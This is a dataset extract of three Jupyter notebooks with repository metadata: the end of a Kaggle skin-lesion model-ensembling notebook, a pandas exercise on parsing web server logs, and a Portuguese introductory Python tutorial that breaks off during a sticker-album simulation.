"5 Models to predict:\n/kaggle/working/model_fold_1.h5\n/kaggle/working/model_fold_2.h5\n/kaggle/working/model_fold_3.h5\n/kaggle/working/model_fold_4.h5\n/kaggle/working/model_fold_5.h5\n"
],
[
"test_dataset = get_test_dataset(TEST_FILENAMES, batch_size=config['BATCH_SIZE'], buffer_size=AUTO)\nNUM_TEST_IMAGES = len(test)\ntest_preds = np.zeros((NUM_TEST_IMAGES, 1))\n\n\nfor model_path in model_path_list:\n# tf.tpu.experimental.initialize_tpu_system(tpu)\n K.clear_session()\n print(model_path)\n model = model_fn((config['HEIGHT'], config['WIDTH'], config['CHANNELS']))\n model.load_weights(model_path)\n \n test_preds += model.predict(test_dataset) / n_models\n\n\nimage_names = next(iter(test_dataset.unbatch().map(lambda data, image_name: image_name).batch(NUM_TEST_IMAGES))).numpy().astype('U')\nname_preds = dict(zip(image_names, test_preds.reshape(len(test_preds))))\ntest['target'] = test.apply(lambda x: name_preds[x['image_name']], axis=1)",
"/kaggle/working/model_fold_1.h5\n/kaggle/working/model_fold_2.h5\n/kaggle/working/model_fold_3.h5\n/kaggle/working/model_fold_4.h5\n/kaggle/working/model_fold_5.h5\n"
]
],
[
[
"# Visualize test predictions",
"_____no_output_____"
]
],
[
[
"print(f\"Test predictions {len(test[test['target'] > .5])}|{len(test[test['target'] <= .5])}\")\nprint('Top 10 samples')\ndisplay(test[['image_name', 'sex', 'age_approx','anatom_site_general_challenge','target'] + \n [c for c in test.columns if (c.startswith('pred_fold'))]].head(10))\n\nprint('Top 10 positive samples')\ndisplay(test[['image_name', 'sex', 'age_approx','anatom_site_general_challenge', 'target'] + \n [c for c in test.columns if (c.startswith('pred_fold'))]].query('target > .5').head(10))",
"Test predictions 12|10970\nTop 10 samples\n"
]
],
[
[
"# Test set predictions",
"_____no_output_____"
]
],
[
[
"submission = pd.read_csv(database_base_path + 'sample_submission.csv')\nsubmission['target'] = test['target']\nsubmission.to_csv('submission.csv', index=False)\ndisplay(submission.head(10))\ndisplay(submission.describe())",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb050f96db04be67f07aea806e3206e5ab6899bd | 7,666 | ipynb | Jupyter Notebook | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | 6 | 2020-04-13T19:22:18.000Z | 2021-04-20T18:20:13.000Z | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | null | null | null | 19-workout-blank_combining_datasets_concat_append.ipynb | hanisaf/advanced-data-management-and-analytics | e7bffda5cad91374a14df1a65f95e6a25f72cc41 | [
"MIT"
] | 10 | 2020-05-12T01:02:32.000Z | 2022-02-28T17:04:37.000Z | 28.392593 | 333 | 0.445995 | [
[
[
"import pandas as pd\nimport numpy as np",
"_____no_output_____"
]
],
[
[
"This exercise uses data from: \n Zaker, Farzin, 2019, \"Online Shopping Store - Web Server Logs\", https://doi.org/10.7910/DVN/3QBYB5, Harvard Dataverse, V1 \n \nThe files `server_log_00.txt` `server_log_01.txt` `server_log_02.txt` `server_log_03.txt` `server_log_04.txt` `server_log_05.txt` `server_log_06.txt` `server_log_07.txt` `server_log_08.txt` `server_log_09.txt` contain logs of an online shopping store web server\n\nEach file contains 100 lines for a total of 1000 transaction logs\n\n# Part 1\n\nLet us focus on one file, the code below reads the first file",
"_____no_output_____"
]
],
[
[
"df_00 = pd.read_csv('data/server_log_00.txt', sep='\\n', header=None)\ndf_00.head()",
"_____no_output_____"
]
],
[
[
"Each row is one big string containing the server log. The [log contains multiple fields](https://docs.nginx.com/nginx/admin-guide/monitoring/logging/)\nIn this exercise we are interested in the IP address (the first field) and the timestamp. For example, the first row",
"_____no_output_____"
]
],
[
[
"df_00.iloc[0, 0]",
"_____no_output_____"
]
],
[
[
"is a request coming from `54.36.149.41` on `22/Jan/2019:03:56:14 +0330`. \n\n1. Extract the IP and timestamp in two separate columns. Discard the original column `0`.",
"_____no_output_____"
],
[
"The data frame should look like",
"_____no_output_____"
]
],
[
[
"df_00.head()",
"_____no_output_____"
]
],
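[
[
"One possible way to do the extraction (an illustrative sketch, not the only solution; the column names `ip` and `time` are arbitrary choices): the IP is the first whitespace-separated token and the timestamp sits between the first `[` and the first `]`.",
"_____no_output_____"
],
[
"# extract the IP (first token) and the timestamp (text between the square brackets)\ndf_00['ip'] = df_00[0].str.split(' ').str[0]\ndf_00['time'] = df_00[0].str.split('[').str[1].str.split(']').str[0]\n\n# discard the original raw column\ndf_00 = df_00.drop(columns=[0])\ndf_00.head()",
"_____no_output_____"
]
],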
[
[
"# Part 2\n2. Repeat the same operations for all of the files. In total you should have ten data frames\n3. Combine the ten data frames in one master data frame",
"_____no_output_____"
]
]
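[
[
"A sketch of one way to handle Part 2 (illustrative; it reuses the extraction from the sketch above and the file naming pattern given at the top):",
"_____no_output_____"
],
[
"# read the ten log files, apply the same extraction, then stack them with pd.concat\nframes = []\nfor i in range(10):\n    df = pd.read_csv(f'data/server_log_{i:02d}.txt', sep='\\n', header=None)\n    df['ip'] = df[0].str.split(' ').str[0]\n    df['time'] = df[0].str.split('[').str[1].str.split(']').str[0]\n    frames.append(df.drop(columns=[0]))\n\nmaster = pd.concat(frames, ignore_index=True)\nmaster.shape  # expected: (1000, 2)",
"_____no_output_____"
]
],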
] | [
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
]
] |
cb0517a47510743acc621ee8e7a76e9a61214cef | 95,209 | ipynb | Jupyter Notebook | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | Projeto 1/Fundamentos_de_Python_para_Data_Science.ipynb | josecavalcante720/Python-Para-Ciencia-de-Dados | aae3637b8cdf5a797061903422b1f128540777a6 | [
"MIT"
] | null | null | null | 30.712581 | 12,503 | 0.48508 | [
[
[
"<a href=\"https://colab.research.google.com/github/ricardorocha86/Fundamentos-de-Python-para-ML/blob/main/Fundamentos_de_Python_para_Data_Science.ipynb\" target=\"_parent\"><img src=\"https://colab.research.google.com/assets/colab-badge.svg\" alt=\"Open In Colab\"/></a>",
"_____no_output_____"
],
[
"# **Fundamentos de Python para Data Science**\n",
"_____no_output_____"
],
[
" ",
"_____no_output_____"
],
[
"\nEssa é uma introdução bem rápida aos conceitos fundamentais de programação em Python. Familiarizar-se com tais conceitos é um primeiro passo suficiente para fazer seus primeiros programas e também entender outros códigos feitos em Python. No entanto, não se engane, o universo de Python é gigante e ainda existe muita coisa interessante para se conhecer!\n\nApós terminar essa introdução, não deixe de se desafiar nos exercícios propostos! São importantíssimos para criar manejo e intimidade com a linguagem. ",
"_____no_output_____"
],
[
"## **Conteúdo desse notebook:**\n\n1. [Atribuição de Variáveis](#atri)\n2. [Primeiras Funções](#prim)\n3. [Operadores Aritméticos](#oper)\n4. [Comparações e Booleanos](#comp)\n5. [Condicional IF-ELSE](#cond)\n6. [Definição de Funções](#defi)\n7. [Importação de Bibliotecas](#impo)\n8. [A Biblioteca Numpy](#nump)\n9. [Listas](#lists)\n10. [Métodos de Listas](#metl)\n11. [Métodos de Strings](#mets)\n12. [Funções Importantes](#func)\n13. [Iteradores FOR e WHILE](#iter)\n14. [Projeto: Álbum de Figurinhas](#proj)\n15. [Exercícios](#exer)\n16. [Links Úteis](#links)\n17. [Anexo: Zen of Python](#anex)",
"_____no_output_____"
],
[
"## **Atribuição de Variáveis** <a name=\"atri\"></a>",
"_____no_output_____"
]
],
[
[
"meu_nome = 'Ricardo'\nmeu_sobrenome = 'Rocha'\nmeu_produto = \"Caixa d'agua\"\nminha_frase = '\"Vamos que vamos!\"'\n\nprint(meu_nome)\nprint(meu_sobrenome)\nprint(meu_produto)\nprint(minha_frase)",
"Ricardo\nRocha\nCaixa d'agua\n\"Vamos que vamos!\"\n"
]
],
[
[
"Não é possível atribuir variáveis com nomes começando com números, nem com espaços no nome ou com aspas. ",
"_____no_output_____"
],
[
"OBS.: O **hashtag #** na frente de uma linha torna ela um **comentário**, pois o interpretador ignora tudo que vem depois dela ",
"_____no_output_____"
],
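[
"Exemplo ilustrativo (adicionado): alguns nomes de variáveis que o Python não aceita, deixados como comentários para não gerar erro de sintaxe.",
"_____no_output_____"
],
[
"# Os nomes abaixo são inválidos e causariam SyntaxError se descomentados:\n# 1nome = 'Ana'        # não pode começar com número\n# meu nome = 'Ana'     # não pode conter espaços\n# 'nome' = 'Ana'       # não pode usar aspas no nome\nnome_valido_1 = 'Ana'  # válido: letras, números e underline, sem começar com número\nprint(nome_valido_1)",
"_____no_output_____"
],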
[
"## **Primeiras Funções** <a name=\"prim\"></a>",
"_____no_output_____"
],
[
"Conheça a função **len**, que retorna o tamanho de uma string (e de outros tipos de objetos também).\n\nA função **type**, que retorna o tipo do objeto na variável de entrada.\n\nA função **round**, que arredonda um número de acordo com as casas decimais desejadas.\n\nE a função **help**, que retorna a documentação da função inserida como entrada.",
"_____no_output_____"
]
],
[
[
"nome = 'Ricardo'\nlen(nome)",
"_____no_output_____"
]
],
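[
[
"Exemplo ilustrativo (adicionado) das funções **round** e **help** citadas acima:",
"_____no_output_____"
],
[
"# round arredonda para o número de casas decimais desejado\nprint(round(3.14159, 2))\nprint(round(2.71828, 3))\n\n# help mostra a documentação de uma função\nhelp(len)",
"_____no_output_____"
]
],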
[
[
"Não só no Python, mas em programação em geral, sempre precisamos controlar o tipo das variáveis que utilizamos. Veja o exemplo abaixo:",
"_____no_output_____"
]
],
[
[
"minha_idade = '33'\ntype(minha_idade)\n",
"_____no_output_____"
]
],
[
[
"Usando a função **int** para converter a variável em formato string para o formato inteiro",
"_____no_output_____"
]
],
[
[
"\nminha_idade = int(minha_idade)\ntype(minha_idade)",
"_____no_output_____"
]
],
[
[
"## **Operadores Aritméticos** <a name=\"oper\"></a>",
"_____no_output_____"
],
[
"Confira na tabela abaixo como funcionam os operadores aritméticos em Python. \n\nEm especial, veja que a sintaxe da exponenciação não é feita através do sinal '^'.",
"_____no_output_____"
],
[
"| Operador | Nome | Descrição |\n|--------------|----------------|--------------------------------------------------------|\n| ``a + b`` | Adição | Soma entre ``a`` e ``b`` |\n| ``a - b`` | Subtração | Diferença entre ``a`` e ``b`` |\n| ``a * b`` | Multiplicação | Produto entre ``a`` e ``b`` |\n| ``a / b`` | Divisão | Divisão usual entre ``a`` e ``b`` |\n| ``a // b`` | Divisão inteira | A divisão entre ``a`` e ``b``, removendo as partes decimais |\n| ``a % b`` | Resto da divisão | O resto da divisão inteira de ``a`` por ``b`` |\n| ``a ** b`` | Exponenciação | ``a`` elevado a ``b`` |\n| ``-a`` | Negação | O negativo de ``a`` |",
"_____no_output_____"
]
],
[
[
"a, b = 7, 3  # valores de exemplo para testar os operadores\n\nprint(a + b)\nprint(a - b)\nprint(a * b)\nprint(a / b)\nprint(a // b)\nprint(a % b)\nprint(a ** b)\nprint(-a)",
"_____no_output_____"
],
[
"print(max(a, b))\nprint(min(a, b))\nprint(abs(-a))",
"7\n3\n7\n"
]
],
[
[
"## **Comparações e Booleanos** <a name=\"comp\"></a>",
"_____no_output_____"
],
[
"Quando comparamos objetos em Python é como se estivéssemos fazendo uma pergunta a ele. Duas variáveis são iguais? Uma é maior que a outra? \n\nE a resposta é um objeto do tipo **booleano**, que é indicado por **True** ou **False**, indicando, respectivamente, se a resposta é verdadeira ou falsa.",
"_____no_output_____"
]
],
[
[
"var1 = 35\nvar2 = 36\n\nvar1 == var2",
"_____no_output_____"
],
[
"print(type(33.2) == str)\nprint(type(33.2) == int)\nprint(type(33.2) == float)",
"False\nFalse\nTrue\n"
],
[
"True and True\nTrue or False\nnot False",
"_____no_output_____"
]
],
[
[
"## **Condicional IF-ELSE** <a name=\"cond\"></a>",
"_____no_output_____"
],
[
"Veja abaixo como funciona a estrutura geral de condicionais no Python. \n\nTemos a versão IF ELSE, e a versão IF ELIF ELSE.\n\nNote que é possível utilizar o ELIF várias vezes se necessário.\n\nNo espaço de condição, o Python espera um objeto booleano. Se for True, ele executa, se for False, segue adiante. \n\nNote também a estrutura de identação do Python. Aqui não usamos (), [] ou {} para estipular o que deve ser executado nas condicionais. Simplesmente colocamos o código que deve ser executado na linha seguinte, mas identado. Em geral, se utiliza o espaço de **1 tab**.",
"_____no_output_____"
]
],
[
[
"# sintaxe IF-ELSE geral\nif condição:\n executa aqui\nelse:\n executa aqui\n\n# sintaxe IF-ELIF-ELSE geral\nif condição:\n executa aqui\nelif outra_condição:\n executa aqui\nelse:\n executa aqui\n\n#não executar essa célula!",
"_____no_output_____"
],
[
"a, b, c = 1, -4, 3\n\ndelta = b**2 - 4*a*c\n\nif delta > 0:\n    x1 = (-b + delta**0.5)/(2*a)\n    x2 = (-b - delta**0.5)/(2*a)\n    print('As raízes são {} e {}'.format(x1, x2))\nelif delta == 0:\n    x = -b/(2*a)\n    print('A única raíz é {}'.format(x))\nelse:\n    print('Não há soluções reais para essa equação')",
"As raízes são 3.0 e 1.0\n"
]
],
[
[
"## **Definição de Funções** <a name=\"defi\"></a>",
"_____no_output_____"
],
[
"Uma função é um recurso para não precisarmos repetir o mesmo código desnecessariamente. Assim como as funções da matemática, sua tarefa é transformar um input, uma entrada, uma coleção de variáveis, em uma saída, um output. \n\nNo exemplo abaixo, utilizamos como variáveis o tipo de símbolo e o tamanho da linha que queremos fazer. Você entenderá melhor vendo o exemplo:\n\nDa mesma maneira que na estrutura de condicionais, o conteúdo de uma função fica nas linhas seguintes sendo indicados pela **indentação** do código",
"_____no_output_____"
]
],
[
[
"def Mensagem(simbolo = '*', tamanho = 51):\n    print(simbolo*tamanho)\n    print('Estamos só começando, o melhor ainda está por vir!')\n    print(simbolo*tamanho)",
"_____no_output_____"
],
[
"Mensagem('-', 51) ",
"---------------------------------------------------\nEstamos só começando, o melhor ainda está por vir!\n---------------------------------------------------\n"
]
],
[
[
"Voltando no exemplo da fórmula de Bhaskara, fica bem conveniente quando colocamos no formato de função, para analisar as saídas de maneira mais prática. ",
"_____no_output_____"
]
],
[
[
"def Bhaskara(a, b, c):\n # dando uma resposta adequada para quando o valor de a for igual a zero\n if a == 0:\n print('Quando a = 0 não se aplica Bhaskara')\n else:\n delta = b**2 - 4*a*c\n\n if delta > 0:\n x1 = (-b + delta**0.5)/(2*a)\n x2 = (-b - delta**0.5)/(2*a)\n print('As raízes são {} e {}'.format(round(x1, 2), round(x2, 2)))\n elif delta == 0:\n x = -b/(2*a)\n print('A única raíz é {}'.format(x))\n else:\n print('Não há soluções reais para essa equação')",
"_____no_output_____"
],
[
"Bhaskara(3, 2, 0.9)",
"Não há soluções reais para essa equação\n"
]
],
[
[
"## **Importação de Bibliotecas** <a name=\"impo\"></a>",
"_____no_output_____"
]
],
[
[
"from math import pi\nprint(pi)",
"3.141592653589793\n"
],
[
"import math\nprint(math.pi)",
"3.141592653589793\n"
],
[
"import math as m\nprint(m.pi)",
"3.141592653589793\n"
]
],
[
[
"## **A Biblioteca Numpy** <a name=\"nump\"></a>",
"_____no_output_____"
],
[
"Numpy é a biblioteca mais popular do python para se trabalhar com arrays. \n\nArrays são conjuntos de valores, que podem ser n-dimensionais. \n\nGeralmente, um número apenas, um ponto, é um array de dimensão 0\n\nUma lista de valores é um array de dimensão 1. \n\nUma matriz de valores é uma array de dimensão 2. \n\nUm tensor de valores é um array de dimensão 3. \n",
"_____no_output_____"
]
],
[
[
"import numpy as np",
"_____no_output_____"
],
[
"a0 = np.array(1)\na1 = np.array([1, 2])\na2 = np.array([[1, 2], [3, 4]])\na3 = np.array([[[1, 2], [3, 4]], [[5, 6], [7, 8]]])",
"_____no_output_____"
],
[
"print('Array a0:\\n', a0)\nprint('Array a1:\\n', a1)\nprint('Array a2:\\n', a2)\nprint('Array a3:\\n', a3)",
"Array a0:\n 1\nArray a1:\n [1 2]\nArray a2:\n [[1 2]\n [3 4]]\nArray a3:\n [[[1 2]\n [3 4]]\n\n [[5 6]\n [7 8]]]\n"
]
],
[
[
"Use o atributo ndim para verificar a dimensão dos arrays numpy",
"_____no_output_____"
]
],
[
[
"print('Dimensão de a0:', a0.ndim)\nprint('Dimensão de a1:', a1.ndim)\nprint('Dimensão de a2:', a2.ndim)\nprint('Dimensão de a3:', a3.ndim)",
"Dimensão de a0: 0\nDimensão de a1: 1\nDimensão de a2: 2\nDimensão de a3: 3\n"
]
],
[
[
"Transforme uma lista em um array",
"_____no_output_____"
]
],
[
[
"lista = [1, 2, 3, 4]\narray = np.array(lista)",
"_____no_output_____"
]
],
[
[
"Arrays são feitos para se trabalhar com álgebra linear. Veja a diferença quando multiplicamos cada elemento por um escalar",
"_____no_output_____"
]
],
[
[
"print(2*lista)\nprint(2*array)",
"[1, 2, 3, 4, 1, 2, 3, 4]\n[2 4 6 8]\n"
]
],
[
[
"Similarmente, podemos realizar as demais operações com arrays",
"_____no_output_____"
]
],
[
[
"print(array + array)\nprint(array * 2)\nprint(array / 3)\nprint(array ** 2)\nprint(array // 2)\nprint(array % 2)",
"[2 4 6 8]\n[2 4 6 8]\n[0.33333333 0.66666667 1. 1.33333333]\n[ 1 4 9 16]\n[0 1 1 2]\n[1 0 1 0]\n"
]
],
[
[
"## **Listas** <a name=\"lists\"></a>",
"_____no_output_____"
],
[
"Um objeto do tipo lista é um dos mais importantes do universo Python. Sua versatilidade permite a construção e organização simples de diversas funcionalidades. **Uma lista é definida por conchetes [ ]**. Vejamos alguns exemplos:",
"_____no_output_____"
]
],
[
[
"minha_lista = [1, 1, 2, 3, 5, 8, 13]",
"_____no_output_____"
],
[
"print(minha_lista)",
"[1, 1, 2, 3, 5, 8, 13]\n"
],
[
"len(minha_lista)",
"_____no_output_____"
]
],
[
[
"**Importante**: A indexação no Python, assim como em diversas linguagens de programação, começa com índice 0.\n\nIsso quer dizer que o primeiro elemento está na entrada 0 da lista, o segundo elemento na entrada 1, e assim por diante.\n\nNós acessamos os elementos de uma lista também utilizando **colchetes**",
"_____no_output_____"
]
],
[
[
"minha_lista[0]",
"_____no_output_____"
],
[
"minha_lista[len(minha_lista) - 1]",
"_____no_output_____"
]
],
[
[
"Uma lista permite armazenar todos os tipos de objetos do Python, veja no exemplo abaixo:",
"_____no_output_____"
]
],
[
[
"lista = ['Python', 1996, True, len, [1,2,'Ricardo']]\nprint(lista)",
"['Python', 1996, True, <built-in function len>, [1, 2, 'Ricardo']]\n"
],
[
"lista[0] + ' é muito massa' ",
"_____no_output_____"
],
[
"lista[1] + 1337",
"_____no_output_____"
],
[
"lista[2] and True",
"_____no_output_____"
],
[
"lista[3](lista)",
"_____no_output_____"
]
],
[
[
"Podemos acessar caracteres de listas através de colchetes também. No python, strings são como listas de caracteres:",
"_____no_output_____"
]
],
[
[
"'Python'[0]",
"_____no_output_____"
],
[
"py = 'Python'\npy[0] + py[5]",
"_____no_output_____"
]
],
[
[
"E podemos acessar listas dentro de listas",
"_____no_output_____"
]
],
[
[
"lista[4]",
"_____no_output_____"
],
[
"lista[4][2]",
"_____no_output_____"
],
[
"lista[4][2][0]",
"_____no_output_____"
],
[
"lista[0]",
"_____no_output_____"
],
[
"lista[0][0]",
"_____no_output_____"
]
],
[
[
"Alguns comandos úteis para acessar elementos em listas:",
"_____no_output_____"
]
],
[
[
"frase = 'Python é excelente para análise de dados'",
"_____no_output_____"
],
[
"frase[:6] #retorna todos os elementos até o indice 6 da lista (o indice 6 (sétimo elemento) não está incluido)",
"_____no_output_____"
],
[
"frase[6:] #retorna todos os elementos após o indice 6 da lista",
"_____no_output_____"
]
],
[
[
"No Python, o padrão é trabalhar com **intervalos semi-abertos [ , )**, como no exemplo abaixo. O índice 9 está incluso na seleção, mas não o 18. ",
"_____no_output_____"
]
],
[
[
"frase[9:18] # retorna o elemento de indice 9 até o 18, mas não inclui o 18",
"_____no_output_____"
]
],
[
[
"Para inverter a ordem de uma lista, utilize",
"_____no_output_____"
]
],
[
[
"frase[::-1]",
"_____no_output_____"
]
],
[
[
"Para tomar elementos de 2 em 2, utilize",
"_____no_output_____"
]
],
[
[
"frase[::2]",
"_____no_output_____"
]
],
[
[
"Combine os comandos da maneira que lhe for conveniente",
"_____no_output_____"
]
],
[
[
"frase[::-1][::3]",
"_____no_output_____"
]
],
[
[
"## **Métodos de Listas** <a name=\"metl\"></a>",
"_____no_output_____"
],
[
"**Métodos são como funções que são aplicáveis a um certo tipo de objetos.** Nesse caso, veremos os métodos para os objetos do tipo lista. Métodos são inerentes ao Python pelo contexto de programação orientada a objetos, que veremos com mais detalhes adiante nesse curso",
"_____no_output_____"
]
],
[
[
"lista = ['A', 'B']",
"_____no_output_____"
],
[
"lista.append('C')\nlista\n ",
"_____no_output_____"
],
[
"lista.pop()",
"_____no_output_____"
],
[
"lista.count('B')",
"_____no_output_____"
],
[
"lista.index('B')",
"_____no_output_____"
]
],
[
[
"## **Métodos de Strings** <a name=\"mets\"></a>\n",
"_____no_output_____"
]
],
[
[
"nome = 'Ricardo Rocha'",
"_____no_output_____"
],
[
"nome.lower()",
"_____no_output_____"
],
[
"nome.upper()",
"_____no_output_____"
],
[
"nome.capitalize()",
"_____no_output_____"
],
[
"nome.split(' ')",
"_____no_output_____"
]
],
[
[
"## **Funções Importantes** <a name=\"func\"></a>",
"_____no_output_____"
],
[
"O comando **input** serve para se comunicar com o usuário enquanto se executa um programa. Veja o exemplo abaixo",
"_____no_output_____"
]
],
[
[
"x = input('Digite o seu nome: ')",
"Digite o seu nome: Ricardo\n"
],
[
"print(x)",
"Ricardo\n"
],
[
"y = input('Digite a sua idade: ')\nprint('\\nA idade declarada foi {}'.format(y))",
"Digite a sua idade: 33\n\nA idade declarada foi 33\n"
]
],
[
[
"Mas note que os inputs são sempre no formato string. Se quisermos usá-los numericamente, temos que converter as entradas adequadamente. Em geral usamos a função **int** para inteiros ou **float** para números reais. Você pode usar a função float para números que são inteiros também.",
"_____no_output_____"
]
],
[
[
"y = int(input('Digite a sua idade '))\n\nprint('\\nSe você já fez aniversário esse ano, seu ano de nascimento foi {}.'.format(2020 - y))",
"Digite a sua idade 33\n\nSe você já fez aniversário esse ano, seu ano de nascimento foi 1987.\n"
]
],
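[
[
"Exemplo ilustrativo (adicionado) usando a função **float** para converter uma entrada com casas decimais:",
"_____no_output_____"
],
[
"altura = float(input('Digite a sua altura em metros: '))\nprint('Sua altura é {} metros'.format(altura))\nprint(type(altura))",
"_____no_output_____"
]
],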
[
[
"\n\n---\n\n",
"_____no_output_____"
],
[
"A função **range** cria um objeto capaz de gerar listas de valores entre dois números. Ela não gera a lista em si, mas um gerador de lista pra quando ela for utilizada. **Ela trabalha com intervalos semi-abertos do tipo [ , )**. Veja os exemplos.",
"_____no_output_____"
]
],
[
[
"range(4)",
"_____no_output_____"
]
],
[
[
"Para listar os valores da função range, utilize o comando **list**",
"_____no_output_____"
]
],
[
[
"list(range(4))",
"_____no_output_____"
]
],
[
[
"Use-a com dois parâmetros para definir o começo e o fim da lista. Note que o primeiro valor é incluido, mas o último não, pois o intervalo dela é semi-aberto",
"_____no_output_____"
]
],
[
[
"list(range(3, 10))",
"_____no_output_____"
]
],
[
[
"Você ainda pode usar um terceiro parâmetro, que é o passo da lista. Ele deve ser inteiro e representa o salto de um número para o outro.",
"_____no_output_____"
]
],
[
[
"list(range(2, 21, 2))",
"_____no_output_____"
],
[
"list(range(10, 101, 10))",
"_____no_output_____"
]
],
[
[
"A função **list** também pode ser utilizada para quebrar uma string em caracteres dentro de uma lista, veja:",
"_____no_output_____"
]
],
[
[
"list('Python')",
"_____no_output_____"
]
],
[
[
"## **Iteradores FOR e WHILE** <a name=\"iter\"></a>",
"_____no_output_____"
],
[
"Utilizamos a estrutura de repetição FOR sempre que desejamos repetir um certo pedaço de código, com alterações ou não, por um número pré-determinado de vezes.\n\nVeja os exemplos",
"_____no_output_____"
]
],
[
[
"for variante in lista_de_variações:\n codigo a ser repetido\n\n#esquema geral do FOR, não executar esse bloco",
"_____no_output_____"
],
[
"for i in ['banana', 'mamão', 'abacate']:\n print('Eu gosto de {}'.format(i))",
"Eu gosto de banana\nEu gosto de mamão\nEu gosto de abacate\n"
],
[
"for i in range(10):\n print(i*'*')",
"\n*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n"
]
],
[
[
"Problema: Se eu tomar dois números inteiros no intervalo [1, 10], qual a probabilidade aproximada da soma dos números ser maior que 10?",
"_____no_output_____"
]
],
[
[
"from random import randint\nlista = []\nreplicas = 10000\n\nfor i in range(replicas):\n if randint(1,10) + randint (1,10) > 10:\n lista.append(True)\n else:\n lista.append(False)\n\nprob = sum(lista)/replicas\n\nprint('A probabilidade aproximada é {}%'.format(100*prob))",
"A probabilidade aproximada é 54.52%\n"
]
],
[
[
"\n\n---\n\n",
"_____no_output_____"
],
[
"O iterador WHILE usamos quando queremos repetir código sem saber de antemão quando este deve ser interrompido. Ele será finalizado quando alguma condição for satisfeita. \n\nPor isso, tome cuidado em não escrever um WHILE infinito. Você terá que cancelar a execução do código para pará-lo.\n\nVeja a estrutura geral",
"_____no_output_____"
]
],
[
[
"while condicao_verdadeira:\n    codigo repetido\n    if condicao:\n        break\n \n#esquema geral do WHILE, não executar esse bloco",
"_____no_output_____"
],
[
"i = 1\nwhile i <= 10:\n    print(i * '*') \n    i += 1",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********\n"
]
],
[
[
"Código parecido utilizando o comando break para interromper o loop (note que, nesta versão, o break acontece quando i chega a 10, antes de imprimir a linha com dez asteriscos)",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile True:\n print(i * '*') \n i += 1\n if i == 10:\n break\n",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n"
]
],
[
[
"Exemplo de um **while** infinito",
"_____no_output_____"
]
],
[
[
"while True:\n print('Python é legal demais!')",
"_____no_output_____"
]
],
[
[
"O **while** também aceita o comando **else** após o seu fim: o bloco do else é executado quando o laço termina normalmente, ou seja, quando a condição se torna falsa sem que um break tenha sido acionado",
"_____no_output_____"
]
],
[
[
"i = 1\nwhile i <= 10:\n print(i * '*') \n i += 1\nelse:\n print('*')",
"*\n**\n***\n****\n*****\n******\n*******\n********\n*********\n**********\n*\n"
]
],
[
[
"## ***Projeto: simulação de um álbum de figurinhas*** <a name=\"proj\"></a>",
"_____no_output_____"
],
[
"### EXEMPLO: **Álbum Premier League 2019-2020**\n1. Total de cromos: **636**\n2. Preço do livro ilustrado capa brochura: **R\\$ 8,90**\n3. Envelope com 5 cromos: **R\\$ 2,50**\n\n### SUPOSIÇÕES\n1. Todas as figurinhas tem igual probabilidade de serem sorteradas\n2. Um pacotinho é comprado por vez \n\n### ALGORITMO\n1. Comprar um pacotinho de figurinhas (5 figurinhas cada, que podem ser repetidas);\n2. Colar no álbum e verificar se o álbum está completo;\n3. Caso esteja incompleto, comprar mais um pacotinho, caso contrário, terminar.\n\n### PERGUNTAS\n1. Qual o valor médio investido para completar o álbum nessas condições?\n2. Quantos pacotes são necessários comprar, em média, para completar o álbum?\n3. Qual é a distribuição empírica do valor investido para completar o álbum?",
"_____no_output_____"
]
],
[
[
"n_album = 636\npreco_pacote = 2.50\npreco_album = 8.90\nsimulacoes = 1000",
"_____no_output_____"
],
[
"import numpy as np\n\n# representação do álbum\nalbum = np.zeros(n_album) \n\n# representação do pacote de figurinhas\npacotinho = np.random.choice(range(n_album), 5)\npacotinho\n\n# 'colando' as figurinhas obtidas no álbum\nfor i in pacotinho:\n album[i] += 1",
"_____no_output_____"
],
[
"# comprando figurinhas até completar o álbum\ndef SimulaAlbum():\n album = np.zeros(n_album) \n pacotes = 0\n while not np.all(album > 0):\n pacotinho = np.random.choice(range(n_album), 5)\n pacotes += 1\n\n for i in pacotinho:\n album[i] += 1\n \n\n valor_gasto = preco_album + preco_pacote * pacotes \n\n return valor_gasto, pacotes\n\nSimulaAlbum()",
"_____no_output_____"
],
[
"valores = []\nfor i in range(simulacoes):\n valores.append(SimulaAlbum()[0])\n if (i+1) % 50 == 0:\n print('Simulação: ', i+1, '/', simulacoes)",
